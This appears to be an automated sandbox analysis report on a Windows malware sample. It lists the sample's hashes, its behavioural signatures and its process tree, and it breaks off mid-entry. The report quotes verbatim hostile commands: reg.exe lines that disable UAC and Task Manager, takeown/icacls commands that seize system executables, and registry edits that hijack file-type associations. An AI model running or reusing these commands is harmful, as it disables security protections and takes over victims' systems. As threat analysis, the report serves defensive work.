Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 23:56
Static task
static1
Behavioral task
behavioral1
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win10v2004-20240802-en
General
-
Target
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
-
Size
514KB
-
MD5
65c713d83b613d647d369ed305632930
-
SHA1
eb79bea11c59b78498dbf65679ba1a24203e8d9e
-
SHA256
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
-
SHA512
26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
-
SSDEEP
6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exepid Process 1740 takeown.exe 1648 icacls.exe 1056 icacls.exe 2824 icacls.exe 3192 takeown.exe 4480 icacls.exe 4904 takeown.exe 5040 takeown.exe 4732 icacls.exe 2016 icacls.exe 2844 takeown.exe 3456 takeown.exe 3220 icacls.exe 3636 takeown.exe 4972 icacls.exe 3040 takeown.exe 2936 icacls.exe 3272 icacls.exe 3852 icacls.exe 3728 icacls.exe 4312 takeown.exe 4592 takeown.exe 2820 icacls.exe 4208 takeown.exe 4336 takeown.exe 1536 icacls.exe 840 takeown.exe 2808 takeown.exe 1864 takeown.exe 3244 takeown.exe 4328 icacls.exe 2416 icacls.exe 1956 takeown.exe 2852 icacls.exe 3616 icacls.exe 1716 takeown.exe 2504 icacls.exe 2532 icacls.exe 1096 icacls.exe 3712 icacls.exe 3652 takeown.exe 4816 icacls.exe 2644 takeown.exe 2580 takeown.exe 3084 icacls.exe 3700 icacls.exe 3216 takeown.exe 4676 icacls.exe 2792 takeown.exe 1792 takeown.exe 2976 icacls.exe 4520 icacls.exe 660 icacls.exe 2320 takeown.exe 2140 icacls.exe 3404 takeown.exe 1932 takeown.exe 3136 icacls.exe 3500 icacls.exe 3716 takeown.exe 1524 icacls.exe 5108 takeown.exe 3980 takeown.exe 4028 takeown.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exepid Process 2936 icacls.exe 3960 icacls.exe 1840 takeown.exe 2152 icacls.exe 1204 takeown.exe 2840 takeown.exe 1076 icacls.exe 700 takeown.exe 4924 icacls.exe 4944 takeown.exe 4336 takeown.exe 2252 takeown.exe 1664 icacls.exe 3404 takeown.exe 4480 icacls.exe 1436 takeown.exe 4672 takeown.exe 1936 takeown.exe 2636 takeown.exe 2736 takeown.exe 2668 icacls.exe 3636 takeown.exe 1524 icacls.exe 1056 icacls.exe 3040 takeown.exe 2844 takeown.exe 3084 icacls.exe 1296 takeown.exe 4312 takeown.exe 2012 takeown.exe 4028 takeown.exe 4776 takeown.exe 2672 takeown.exe 2632 icacls.exe 1580 takeown.exe 4380 icacls.exe 1536 icacls.exe 3296 takeown.exe 4864 icacls.exe 5020 icacls.exe 1500 takeown.exe 1080 takeown.exe 1792 takeown.exe 3192 takeown.exe 4428 icacls.exe 2916 takeown.exe 2252 icacls.exe 1260 takeown.exe 4328 icacls.exe 900 icacls.exe 3500 icacls.exe 1220 icacls.exe 3700 icacls.exe 4676 icacls.exe 4740 takeown.exe 2448 takeown.exe 2288 takeown.exe 3616 icacls.exe 4084 icacls.exe 2896 takeown.exe 1864 takeown.exe 3832 takeown.exe 4720 icacls.exe 2836 takeown.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process File created C:\Windows\System32\tzsync.exe 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe File opened for modification C:\Windows\System32\tzsync.exe 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 13 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid Process Token: SeDebugPrivilege 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Token: SeTakeOwnershipPrivilege 1840 takeown.exe Token: SeTakeOwnershipPrivilege 2692 takeown.exe Token: SeTakeOwnershipPrivilege 1180 takeown.exe Token: SeTakeOwnershipPrivilege 3036 takeown.exe Token: SeTakeOwnershipPrivilege 2588 takeown.exe Token: SeTakeOwnershipPrivilege 1936 takeown.exe Token: SeTakeOwnershipPrivilege 1436 takeown.exe Token: SeTakeOwnershipPrivilege 1204 takeown.exe Token: SeTakeOwnershipPrivilege 2836 takeown.exe Token: SeTakeOwnershipPrivilege 2992 takeown.exe Token: SeTakeOwnershipPrivilege 1792 takeown.exe Token: SeTakeOwnershipPrivilege 648 takeown.exe Token: SeTakeOwnershipPrivilege 2868 takeown.exe Token: SeTakeOwnershipPrivilege 2792 takeown.exe Token: SeTakeOwnershipPrivilege 840 takeown.exe Token: SeTakeOwnershipPrivilege 1080 takeown.exe Token: SeTakeOwnershipPrivilege 2056 takeown.exe Token: SeTakeOwnershipPrivilege 1616 takeown.exe Token: SeTakeOwnershipPrivilege 3040 takeown.exe Token: SeTakeOwnershipPrivilege 2268 takeown.exe Token: SeTakeOwnershipPrivilege 1652 takeown.exe Token: SeTakeOwnershipPrivilege 2576 takeown.exe Token: SeTakeOwnershipPrivilege 1132 takeown.exe Token: SeTakeOwnershipPrivilege 1744 takeown.exe Token: SeTakeOwnershipPrivilege 1380 takeown.exe Token: SeTakeOwnershipPrivilege 2916 takeown.exe Token: SeTakeOwnershipPrivilege 1500 takeown.exe Token: SeTakeOwnershipPrivilege 700 takeown.exe Token: SeTakeOwnershipPrivilege 2372 takeown.exe Token: SeTakeOwnershipPrivilege 1548 takeown.exe Token: SeTakeOwnershipPrivilege 2320 takeown.exe Token: SeTakeOwnershipPrivilege 2688 takeown.exe Token: SeTakeOwnershipPrivilege 2644 takeown.exe Token: SeTakeOwnershipPrivilege 2808 takeown.exe Token: SeTakeOwnershipPrivilege 2448 takeown.exe Token: SeTakeOwnershipPrivilege 2904 takeown.exe Token: SeTakeOwnershipPrivilege 796 takeown.exe Token: SeTakeOwnershipPrivilege 2740 takeown.exe Token: SeTakeOwnershipPrivilege 1932 takeown.exe Token: SeTakeOwnershipPrivilege 2636 takeown.exe Token: SeTakeOwnershipPrivilege 2012 takeown.exe Token: SeTakeOwnershipPrivilege 2288 takeown.exe Token: SeTakeOwnershipPrivilege 1580 takeown.exe Token: SeTakeOwnershipPrivilege 1864 takeown.exe Token: SeTakeOwnershipPrivilege 2736 takeown.exe Token: SeTakeOwnershipPrivilege 2840 takeown.exe Token: SeTakeOwnershipPrivilege 2844 takeown.exe Token: SeTakeOwnershipPrivilege 2884 takeown.exe Token: SeTakeOwnershipPrivilege 668 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription pid Process procid_target PID 2060 wrote to memory of 588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 31 PID 2060 wrote to memory of 588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 31 PID 2060 wrote to memory of 588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 31 PID 2060 wrote to memory of 1060 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 32 PID 2060 wrote to memory of 1060 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 32 PID 2060 wrote to memory of 1060 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 32 PID 2060 wrote to memory of 2692 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 35 PID 2060 wrote to memory of 2692 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 35 PID 2060 wrote to memory of 2692 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 35 PID 2060 wrote to memory of 2632 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 37 PID 2060 wrote to memory of 2632 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 37 PID 2060 wrote to memory of 2632 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 37 PID 2060 wrote to memory of 1840 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 38 PID 2060 wrote to memory of 1840 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 38 PID 2060 wrote to memory of 1840 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 38 PID 2060 wrote to memory of 2532 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 40 PID 2060 wrote to memory of 2532 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 40 PID 2060 wrote to memory of 2532 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 40 PID 2060 wrote to memory of 2588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 42 PID 2060 wrote to memory of 2588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 42 PID 2060 wrote to memory of 2588 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 42 PID 2060 wrote to memory of 1648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 43 PID 2060 wrote to memory of 1648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 43 PID 2060 wrote to memory of 1648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 43 PID 2060 wrote to memory of 1180 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 44 PID 2060 wrote to memory of 1180 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 44 PID 2060 wrote to memory of 1180 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 44 PID 2060 wrote to memory of 2152 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 46 PID 2060 wrote to memory of 2152 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 46 PID 2060 wrote to memory of 2152 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 46 PID 2060 wrote to memory of 3036 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 49 PID 2060 wrote to memory of 3036 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 49 PID 2060 wrote to memory of 3036 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 49 PID 2060 wrote to memory of 1664 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 50 PID 2060 wrote to memory of 1664 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 50 PID 2060 wrote to memory of 1664 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 50 PID 2060 wrote to memory of 1936 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 52 PID 2060 wrote to memory of 1936 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 52 PID 2060 wrote to memory of 1936 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 52 PID 2060 wrote to memory of 1584 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 54 PID 2060 wrote to memory of 1584 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 54 PID 2060 wrote to memory of 1584 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 54 PID 2060 wrote to memory of 2576 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 56 PID 2060 wrote to memory of 2576 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 56 PID 2060 wrote to memory of 2576 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 56 PID 2060 wrote to memory of 2332 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 57 PID 2060 wrote to memory of 2332 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 57 PID 2060 wrote to memory of 2332 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 57 PID 2060 wrote to memory of 648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 58 PID 2060 wrote to memory of 648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 58 PID 2060 wrote to memory of 648 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 58 PID 2060 wrote to memory of 1120 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 59 PID 2060 wrote to memory of 1120 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 59 PID 2060 wrote to memory of 1120 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 59 PID 2060 wrote to memory of 2836 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 60 PID 2060 wrote to memory of 2836 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 60 PID 2060 wrote to memory of 2836 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 60 PID 2060 wrote to memory of 1772 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 63 PID 2060 wrote to memory of 1772 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 63 PID 2060 wrote to memory of 1772 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 63 PID 2060 wrote to memory of 2868 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 66 PID 2060 wrote to memory of 2868 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 66 PID 2060 wrote to memory of 2868 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 66 PID 2060 wrote to memory of 2820 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 67
Processes
-
C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"1⤵
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1060
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2632
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1648
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2152
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\write.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1584
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2332
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1772
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
